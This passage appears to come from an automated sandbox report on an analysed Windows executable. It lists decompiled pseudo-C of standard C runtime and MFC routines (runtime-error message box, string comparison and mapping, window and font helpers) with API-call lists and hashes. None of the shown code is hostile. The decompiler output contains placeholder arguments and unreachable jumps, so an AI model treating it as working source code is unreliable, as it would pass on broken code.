                                            						return InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                                            					}
                                            				}
                                            				return _t39;
                                            			}













                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 0041EC77
                                            • GetWindowRect.USER32 ref: 0041EC8E
                                            • SetRect.USER32 ref: 0041ECC8
                                            • InvalidateRect.USER32(?,?,00000001), ref: 0041ECD7
                                            • SetRect.USER32 ref: 0041ECEE
                                            • InvalidateRect.USER32(?,?,00000001), ref: 0041ECFD
                                            • SetRect.USER32 ref: 0041ED28
                                            • InvalidateRect.USER32(?,?,00000001), ref: 0041ED33
                                            • SetRect.USER32 ref: 0041ED4A
                                            • InvalidateRect.USER32(?,?,00000001), ref: 0041ED55
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$Invalidate$Window$Proc
                                            • String ID:
                                            • API String ID: 570070710-0
                                            • Opcode ID: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
                                            • Instruction ID: 516b3e1e2029e257780fbb0876dd7829c2ddb4b881f79dfa1f5106cbf91c212e
                                            • Opcode Fuzzy Hash: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
                                            • Instruction Fuzzy Hash: EC31CB7590020ABFDB10DF94ED88FAA7B7DFB04344F544125FA01A61A0D774AE95CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E00409911(void* __edi, long _a4) {
                                            				char _v164;
                                            				char _v424;
                                            				int _t17;
                                            				long _t19;
                                            				signed int _t42;
                                            				long _t47;
                                            				void* _t48;
                                            				signed int _t54;
                                            				void** _t56;
                                            				void* _t57;
                                            
                                            				_t48 = __edi;
                                            				_t47 = _a4;
                                            				_t42 = 0;
                                            				_t17 = 0x437068;
                                            				while(_t47 !=  *_t17) {
                                            					_t17 = _t17 + 8;
                                            					_t42 = _t42 + 1;
                                            					if(_t17 < 0x4370f8) {
                                            						continue;
                                            					}
                                            					break;
                                            				}
                                            				_t54 = _t42 << 3;
                                            				_t2 = _t54 + 0x437068; // 0x3c000000
                                            				if(_t47 ==  *_t2) {
                                            					_t17 =  *0x439cf0; // 0x0
                                            					if(_t17 == 1 || _t17 == 0 &&  *0x436ba4 == 1) {
                                            						_t16 = _t54 + 0x43706c; // 0x42f53c
                                            						_t56 = _t16;
                                            						_t19 = E00405A40( *_t56);
                                            						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
                                            					} else {
                                            						if(_t47 != 0xfc) {
                                            							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
                                            								E00409B00( &_v424, "<program name unknown>");
                                            							}
                                            							_push(_t48);
                                            							_t49 =  &_v424;
                                            							if(E00405A40( &_v424) + 1 > 0x3c) {
                                            								_t49 = E00405A40( &_v424) +  &_v424 - 0x3b;
                                            								E0040AD30(E00405A40( &_v424) +  &_v424 - 0x3b, "...", 3);
                                            								_t57 = _t57 + 0x10;
                                            							}
                                            							E00409B00( &_v164, "Runtime Error!\n\nProgram: ");
                                            							E00409B10( &_v164, _t49);
                                            							E00409B10( &_v164, "\n\n");
                                            							_t12 = _t54 + 0x43706c; // 0x42f53c
                                            							E00409B10( &_v164,  *_t12);
                                            							_t17 = E0040AC99( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
                                            						}
                                            					}
                                            				}
                                            				return _t17;
                                            			}














                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0040997E
                                            • GetStdHandle.KERNEL32(000000F4,0042F53C,00000000,?,00000000,?), ref: 00409A54
                                            • WriteFile.KERNEL32(00000000), ref: 00409A5B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: File$HandleModuleNameWrite
                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $hpC
                                            • API String ID: 3784150691-1464146632
                                            • Opcode ID: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
                                            • Instruction ID: b539e999a38423ee123e62db49a79e9b5e142f56b6bf41d1579e584f354440c8
                                            • Opcode Fuzzy Hash: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
                                            • Instruction Fuzzy Hash: AF31C372700218AEDF20EA61DC86FAA377CEB45304F90047BF545F61C2E678AE84CE59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E0041538C(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                                            				struct HWND__* _v8;
                                            				void* __ebp;
                                            				void* _t14;
                                            				void* _t17;
                                            				void* _t18;
                                            				void* _t28;
                                            				struct HWND__* _t29;
                                            				signed int _t33;
                                            				void* _t36;
                                            				void* _t40;
                                            				void* _t43;
                                            
                                            				_t28 = __ebx;
                                            				_push(__ecx);
                                            				_t36 = __ecx;
                                            				_t40 = E00414CEF(__ecx);
                                            				_t33 = _a4 & 0x0000fff0;
                                            				_t14 = _t33 - 0xf040;
                                            				if(_t14 == 0) {
                                            					L12:
                                            					if(_a8 != 0x75 || _t40 == 0) {
                                            						L15:
                                            						goto L16;
                                            					} else {
                                            						E004166F5(_t40);
                                            						L11:
                                            						_push(1);
                                            						_pop(0);
                                            						L16:
                                            						return 0;
                                            					}
                                            				}
                                            				_t17 = _t14 - 0x10;
                                            				if(_t17 == 0) {
                                            					goto L12;
                                            				}
                                            				_t18 = _t17 - 0x10;
                                            				if(_t18 == 0 || _t18 == 0xa0) {
                                            					if(_t33 == 0xf060 || _a8 != 0) {
                                            						if(_t40 != 0) {
                                            							_push(_t28);
                                            							_t29 =  *(_t36 + 0x1c);
                                            							_v8 = GetFocus();
                                            							E00413740(_t43, SetActiveWindow( *(_t40 + 0x1c)));
                                            							SendMessageA( *(_t40 + 0x1c), 0x112, _a4, _a8);
                                            							if(IsWindow(_t29) != 0) {
                                            								SetActiveWindow(_t29);
                                            							}
                                            							if(IsWindow(_v8) != 0) {
                                            								SetFocus(_v8);
                                            							}
                                            						}
                                            					}
                                            					goto L11;
                                            				} else {
                                            					goto L15;
                                            				}
                                            			}















                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$ActiveFocus$MessageSend
                                            • String ID: u
                                            • API String ID: 1556911595-4067256894
                                            • Opcode ID: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
                                            • Instruction ID: 08e7680b70c01f71feb78b7b04bbbad669989e92906b740bb6337346909a31ec
                                            • Opcode Fuzzy Hash: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
                                            • Instruction Fuzzy Hash: D2110372600619EBDB346F25ED48AEA7B64EB80315F448037E901962A1D77CDDC2DA98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004170E7(intOrPtr __ecx, short _a4) {
                                            				intOrPtr _v8;
                                            				char _v40;
                                            				void _v68;
                                            				void* _t11;
                                            				signed int _t15;
                                            				int _t20;
                                            				char* _t24;
                                            				struct HDC__* _t26;
                                            
                                            				_v8 = __ecx;
                                            				_t20 = 0xa;
                                            				_t24 = "System";
                                            				_t11 = GetStockObject(0x11);
                                            				if(_t11 != 0) {
                                            					L2:
                                            					if(GetObjectA(_t11, 0x3c,  &_v68) != 0) {
                                            						_t24 =  &_v40;
                                            						_t26 = GetDC(0);
                                            						_t15 = _v68;
                                            						if(_t15 < 0) {
                                            							_v68 =  ~_t15;
                                            						}
                                            						_t20 = MulDiv(_v68, 0x48, GetDeviceCaps(_t26, 0x5a));
                                            						ReleaseDC(0, _t26);
                                            					}
                                            					L6:
                                            					if(_a4 == 0) {
                                            						_a4 = _t20;
                                            					}
                                            					return E00416FCD(_v8, _t24, _a4);
                                            				}
                                            				_t11 = GetStockObject(0xd);
                                            				if(_t11 == 0) {
                                            					goto L6;
                                            				}
                                            				goto L2;
                                            			}












                                            APIs
                                            • GetStockObject.GDI32(00000011), ref: 00417103
                                            • GetStockObject.GDI32(0000000D), ref: 0041710B
                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 00417118
                                            • GetDC.USER32(00000000), ref: 00417127
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041713E
                                            • MulDiv.KERNEL32(?,00000048,00000000), ref: 0041714A
                                            • ReleaseDC.USER32 ref: 00417155
                                            Strings
                                            Similarity
                                            • API ID: Object$Stock$CapsDeviceRelease
                                            • String ID: System
                                            • API String ID: 46613423-3470857405
                                            • Opcode ID: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
                                            • Instruction ID: aedc63dc14c356acfddf8dbf112d5b7e9114f9d10090a13ed9499bd610fb2d75
                                            • Opcode Fuzzy Hash: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
                                            • Instruction Fuzzy Hash: 2F113371B00318BBEB209BA19C45FAF7B78FB05790F404026FA05E62C0D7749D42CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E0040AC99(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                            				intOrPtr* _t4;
                                            				intOrPtr* _t7;
                                            				_Unknown_base(*)()* _t11;
                                            				void* _t14;
                                            				struct HINSTANCE__* _t15;
                                            				void* _t17;
                                            
                                            				_t14 = 0;
                                            				_t17 =  *0x439fd0 - _t14; // 0x0
                                            				if(_t17 != 0) {
                                            					L4:
                                            					_t4 =  *0x439fd4; // 0x0
                                            					if(_t4 != 0) {
                                            						_t14 =  *_t4();
                                            						if(_t14 != 0) {
                                            							_t7 =  *0x439fd8; // 0x0
                                            							if(_t7 != 0) {
                                            								_t14 =  *_t7(_t14);
                                            							}
                                            						}
                                            					}
                                            					return  *0x439fd0(_t14, _a4, _a8, _a12);
                                            				}
                                            				_t15 = LoadLibraryA("user32.dll");
                                            				if(_t15 == 0) {
                                            					L10:
                                            					return 0;
                                            				}
                                            				_t11 = GetProcAddress(_t15, "MessageBoxA");
                                            				 *0x439fd0 = _t11;
                                            				if(_t11 == 0) {
                                            					goto L10;
                                            				} else {
                                            					 *0x439fd4 = GetProcAddress(_t15, "GetActiveWindow");
                                            					 *0x439fd8 = GetProcAddress(_t15, "GetLastActivePopup");
                                            					goto L4;
                                            				}
                                            			}










                                            APIs
                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00409A35,?,Microsoft Visual C++ Runtime Library,00012010,?,0042F53C,?,0042F58C,?,?,?,Runtime Error!Program: ), ref: 0040ACAB
                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040ACC3
                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040ACD4
                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040ACE1
                                            Strings
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                            • API String ID: 2238633743-4044615076
                                            • Opcode ID: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
                                            • Instruction ID: a9e059596031861d50e68843925f1eff39380896684ae965336398d5bbd15c8e
                                            • Opcode Fuzzy Hash: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
                                            • Instruction Fuzzy Hash: 42017131300311AFC7109FB4AC84A2B7BE9EE88791758103BE500E22F5DBB89C15DB6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 40%
                                            			E004160E6(signed short _a4, signed int _a8) {
                                            				struct HINSTANCE__* _t6;
                                            				_Unknown_base(*)()* _t7;
                                            				struct HINSTANCE__* _t13;
                                            				struct HINSTANCE__* _t14;
                                            				CHAR* _t16;
                                            				signed short _t17;
                                            
                                            				_t16 = "COMCTL32.DLL";
                                            				_t14 = GetModuleHandleA(_t16);
                                            				_t6 = LoadLibraryA(_t16);
                                            				_t13 = _t6;
                                            				if(_t13 == 0) {
                                            					return _t6;
                                            				} else {
                                            					_t17 = 0;
                                            					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
                                            					if(_t7 != 0) {
                                            						_push(_a4);
                                            						if( *_t7() != 0) {
                                            							_t17 = _a4;
                                            							if(_t14 == 0) {
                                            								__imp__#17();
                                            								_t17 = _t17 | 0x00003fc0;
                                            							}
                                            						}
                                            					} else {
                                            						if((_a8 & 0x00003fc0) == _a8) {
                                            							__imp__#17();
                                            							_t17 = 0x3fc0;
                                            						}
                                            					}
                                            					FreeLibrary(_t13);
                                            					return _t17;
                                            				}
                                            			}










                                            APIs
                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004163E0,00000000,00020000,?,?,00000000), ref: 004160EF
                                            • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 004160F8
                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0041610C
                                            • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416127
                                            • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416143
                                            • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 0041614F
                                            Strings
                                            Similarity
                                            • API ID: Library$AddressFreeHandleLoadModuleProc
                                            • String ID: COMCTL32.DLL$InitCommonControlsEx
                                            • API String ID: 1437655972-4218389149
                                            • Opcode ID: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
                                            • Instruction ID: 81bca5f6391c8e8793c086ec2d57317fbfa520992b7089d48771000b14303d3d
                                            • Opcode Fuzzy Hash: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
                                            • Instruction Fuzzy Hash: B6F0A436704322A783229F64ED4896F73A9EF947627460436F841E3211DF28DC4687AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E0040BD71(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
                                            				signed int _v8;
                                            				intOrPtr _v20;
                                            				short* _v28;
                                            				int _v32;
                                            				int _v36;
                                            				short* _v40;
                                            				short* _v44;
                                            				char _v58;
                                            				struct _cpinfo _v64;
                                            				void* _v80;
                                            				int _t65;
                                            				int _t66;
                                            				int _t69;
                                            				intOrPtr* _t82;
                                            				intOrPtr* _t84;
                                            				int _t86;
                                            				int _t87;
                                            				int _t88;
                                            				void* _t96;
                                            				char _t99;
                                            				char _t101;
                                            				intOrPtr _t104;
                                            				intOrPtr _t105;
                                            				int _t107;
                                            				short* _t109;
                                            				int _t111;
                                            				int _t114;
                                            				intOrPtr _t115;
                                            				short* _t116;
                                            				int _t118;
                                            
                                            				_push(0xffffffff);
                                            				_push(0x42f6e8);
                                            				_push(E00409800);
                                            				_push( *[fs:0x0]);
                                            				 *[fs:0x0] = _t115;
                                            				_t116 = _t115 - 0x30;
                                            				_v28 = _t116;
                                            				_t118 =  *0x43a068; // 0x0
                                            				_t107 = 1;
                                            				if(_t118 != 0) {
                                            					L5:
                                            					_t111 = _a16;
                                            					if(_t111 > 0) {
                                            						_t88 = E0040BFEE(_a12, _t111);
                                            						_pop(_t96);
                                            						_t111 = _t88;
                                            						_a16 = _t111;
                                            					}
                                            					if(_a24 > 0) {
                                            						_t87 = E0040BFEE(_a20, _a24);
                                            						_pop(_t96);
                                            						_a24 = _t87;
                                            					}
                                            					_t65 =  *0x43a068; // 0x0
                                            					if(_t65 != 2) {
                                            						if(_t65 != _t107) {
                                            							goto L48;
                                            						} else {
                                            							if(_a28 == 0) {
                                            								_t86 =  *0x439efc; // 0x0
                                            								_a28 = _t86;
                                            							}
                                            							if(_t111 == 0 || _a24 == 0) {
                                            								if(_t111 != _a24) {
                                            									if(_a24 <= _t107) {
                                            										if(_t111 > _t107) {
                                            											L30:
                                            											_push(3);
                                            											goto L18;
                                            										} else {
                                            											if(GetCPInfo(_a28,  &_v64) == 0) {
                                            												goto L48;
                                            											} else {
                                            												if(_t111 <= 0) {
                                            													if(_a24 <= 0) {
                                            														goto L39;
                                            													} else {
                                            														if(_v64 >= 2) {
                                            															_t82 =  &_v58;
                                            															if(_v58 != 0) {
                                            																while(1) {
                                            																	_t104 =  *((intOrPtr*)(_t82 + 1));
                                            																	if(_t104 == 0) {
                                            																		goto L20;
                                            																	}
                                            																	_t99 =  *_a20;
                                            																	if(_t99 <  *_t82 || _t99 > _t104) {
                                            																		_t82 = _t82 + 2;
                                            																		if( *_t82 != 0) {
                                            																			continue;
                                            																		} else {
                                            																			goto L20;
                                            																		}
                                            																	} else {
                                            																		goto L17;
                                            																	}
                                            																	goto L49;
                                            																}
                                            															}
                                            														}
                                            														goto L20;
                                            													}
                                            												} else {
                                            													if(_v64 >= 2) {
                                            														_t84 =  &_v58;
                                            														if(_v58 != 0) {
                                            															while(1) {
                                            																_t105 =  *((intOrPtr*)(_t84 + 1));
                                            																if(_t105 == 0) {
                                            																	goto L30;
                                            																}
                                            																_t101 =  *_a12;
                                            																if(_t101 <  *_t84 || _t101 > _t105) {
                                            																	_t84 = _t84 + 2;
                                            																	if( *_t84 != 0) {
                                            																		continue;
                                            																	} else {
                                            																		goto L30;
                                            																	}
                                            																} else {
                                            																	goto L17;
                                            																}
                                            																goto L50;
                                            															}
                                            														}
                                            													}
                                            													goto L30;
                                            													L50:
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										L20:
                                            										_t66 = _t107;
                                            									}
                                            								} else {
                                            									L17:
                                            									_push(2);
                                            									L18:
                                            									_pop(_t66);
                                            								}
                                            							} else {
                                            								L39:
                                            								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
                                            								_v32 = _t69;
                                            								if(_t69 == 0) {
                                            									goto L48;
                                            								} else {
                                            									_v8 = 0;
                                            									E00406830(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
                                            									_v28 = _t116;
                                            									_v40 = _t116;
                                            									_v8 = _v8 | 0xffffffff;
                                            									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
                                            										goto L48;
                                            									} else {
                                            										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
                                            										_v36 = _t114;
                                            										if(_t114 == 0) {
                                            											goto L48;
                                            										} else {
                                            											_v8 = _t107;
                                            											E00406830(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
                                            											_v28 = _t116;
                                            											_t109 = _t116;
                                            											_v44 = _t109;
                                            											_v8 = _v8 | 0xffffffff;
                                            											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
                                            												goto L48;
                                            											} else {
                                            												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            					} else {
                                            						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
                                            					}
                                            				} else {
                                            					if(CompareStringW(0, 0, 0x42f5cc, _t107, 0x42f5cc, _t107) == 0) {
                                            						if(CompareStringA(0, 0, 0x42f5c8, _t107, 0x42f5c8, _t107) == 0) {
                                            							L48:
                                            							_t66 = 0;
                                            						} else {
                                            							 *0x43a068 = 2;
                                            							goto L5;
                                            						}
                                            					} else {
                                            						 *0x43a068 = _t107;
                                            						goto L5;
                                            					}
                                            				}
                                            				L49:
                                            				 *[fs:0x0] = _v20;
                                            				return _t66;
                                            				goto L50;
                                            			}

                                            APIs
                                            • CompareStringW.KERNEL32(00000000,00000000,0042F5CC,00000001,0042F5CC,00000001,00000000,02070E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BDAF
                                            • CompareStringA.KERNEL32(00000000,00000000,0042F5C8,00000001,0042F5C8,00000001,?,0040A577), ref: 0040BDCC
                                            • CompareStringA.KERNEL32(?,?,00000000,0040A577,?,0000000B,00000000,02070E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BE2A
                                            • GetCPInfo.KERNEL32(0000000B,00000000,00000000,02070E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577), ref: 0040BE7B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0000000B,00000000,00000000,?,0040A577), ref: 0040BEFA
                                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
                                            • CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ByteCharCompareMultiStringWide$Info
                                            • String ID:
                                            • API String ID: 1651298574-0
                                            • Opcode ID: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
                                            • Instruction ID: 15593673328f6da1faa78daf279323c0e4ae83b25398234663969b267ace6320
                                            • Opcode Fuzzy Hash: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
                                            • Instruction Fuzzy Hash: 3971783290024AAFDF219F54DC859EB7BBAEB05344F14413BFA51B22A0D7398851DBED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 61%
                                            			E00409DEA(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
                                            				signed int _v8;
                                            				intOrPtr _v20;
                                            				short* _v28;
                                            				int _v32;
                                            				short* _v36;
                                            				short* _v40;
                                            				int _v44;
                                            				void* _v60;
                                            				int _t61;
                                            				int _t62;
                                            				int _t82;
                                            				int _t83;
                                            				int _t88;
                                            				short* _t89;
                                            				int _t90;
                                            				void* _t91;
                                            				int _t99;
                                            				intOrPtr _t101;
                                            				short* _t102;
                                            				int _t104;
                                            
                                            				_push(0xffffffff);
                                            				_push(0x42f5d0);
                                            				_push(E00409800);
                                            				_push( *[fs:0x0]);
                                            				 *[fs:0x0] = _t101;
                                            				_t102 = _t101 - 0x1c;
                                            				_v28 = _t102;
                                            				_t104 =  *0x439ee0; // 0x1
                                            				if(_t104 != 0) {
                                            					L5:
                                            					if(_a16 > 0) {
                                            						_t83 = E0040BFEE(_a12, _a16);
                                            						_pop(_t91);
                                            						_a16 = _t83;
                                            					}
                                            					_t61 =  *0x439ee0; // 0x1
                                            					if(_t61 != 2) {
                                            						if(_t61 != 1) {
                                            							goto L21;
                                            						} else {
                                            							if(_a28 == 0) {
                                            								_t82 =  *0x439efc; // 0x0
                                            								_a28 = _t82;
                                            							}
                                            							asm("sbb eax, eax");
                                            							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
                                            							_v32 = _t88;
                                            							if(_t88 == 0) {
                                            								goto L21;
                                            							} else {
                                            								_v8 = 0;
                                            								E00406830(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
                                            								_v28 = _t102;
                                            								_v40 = _t102;
                                            								_v8 = _v8 | 0xffffffff;
                                            								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
                                            									goto L21;
                                            								} else {
                                            									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
                                            									_v44 = _t99;
                                            									if(_t99 == 0) {
                                            										goto L21;
                                            									} else {
                                            										if((_a9 & 0x00000004) == 0) {
                                            											_v8 = 1;
                                            											E00406830(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
                                            											_v28 = _t102;
                                            											_t89 = _t102;
                                            											_v36 = _t89;
                                            											_v8 = _v8 | 0xffffffff;
                                            											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
                                            												goto L21;
                                            											} else {
                                            												_push(0);
                                            												_push(0);
                                            												if(_a24 != 0) {
                                            													_push(_a24);
                                            													_push(_a20);
                                            												} else {
                                            													_push(0);
                                            													_push(0);
                                            												}
                                            												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
                                            												if(_t99 == 0) {
                                            													goto L21;
                                            												} else {
                                            													goto L30;
                                            												}
                                            											}
                                            										} else {
                                            											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
                                            												L30:
                                            												_t62 = _t99;
                                            											} else {
                                            												goto L21;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            					} else {
                                            						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                            					}
                                            				} else {
                                            					_push(0);
                                            					_push(0);
                                            					_t90 = 1;
                                            					if(LCMapStringW(0, 0x100, 0x42f5cc, _t90, ??, ??) == 0) {
                                            						if(LCMapStringA(0, 0x100, 0x42f5c8, _t90, 0, 0) == 0) {
                                            							L21:
                                            							_t62 = 0;
                                            						} else {
                                            							 *0x439ee0 = 2;
                                            							goto L5;
                                            						}
                                            					} else {
                                            						 *0x439ee0 = _t90;
                                            						goto L5;
                                            					}
                                            				}
                                            				 *[fs:0x0] = _v20;
                                            				return _t62;
                                            			}

                                            APIs
                                            • LCMapStringW.KERNEL32(00000000,00000100,0042F5CC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E2C
                                            • LCMapStringA.KERNEL32(00000000,00000100,0042F5C8,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E48
                                            • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E91
                                            • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409EC9
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F21
                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F37
                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F6A
                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409FD2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
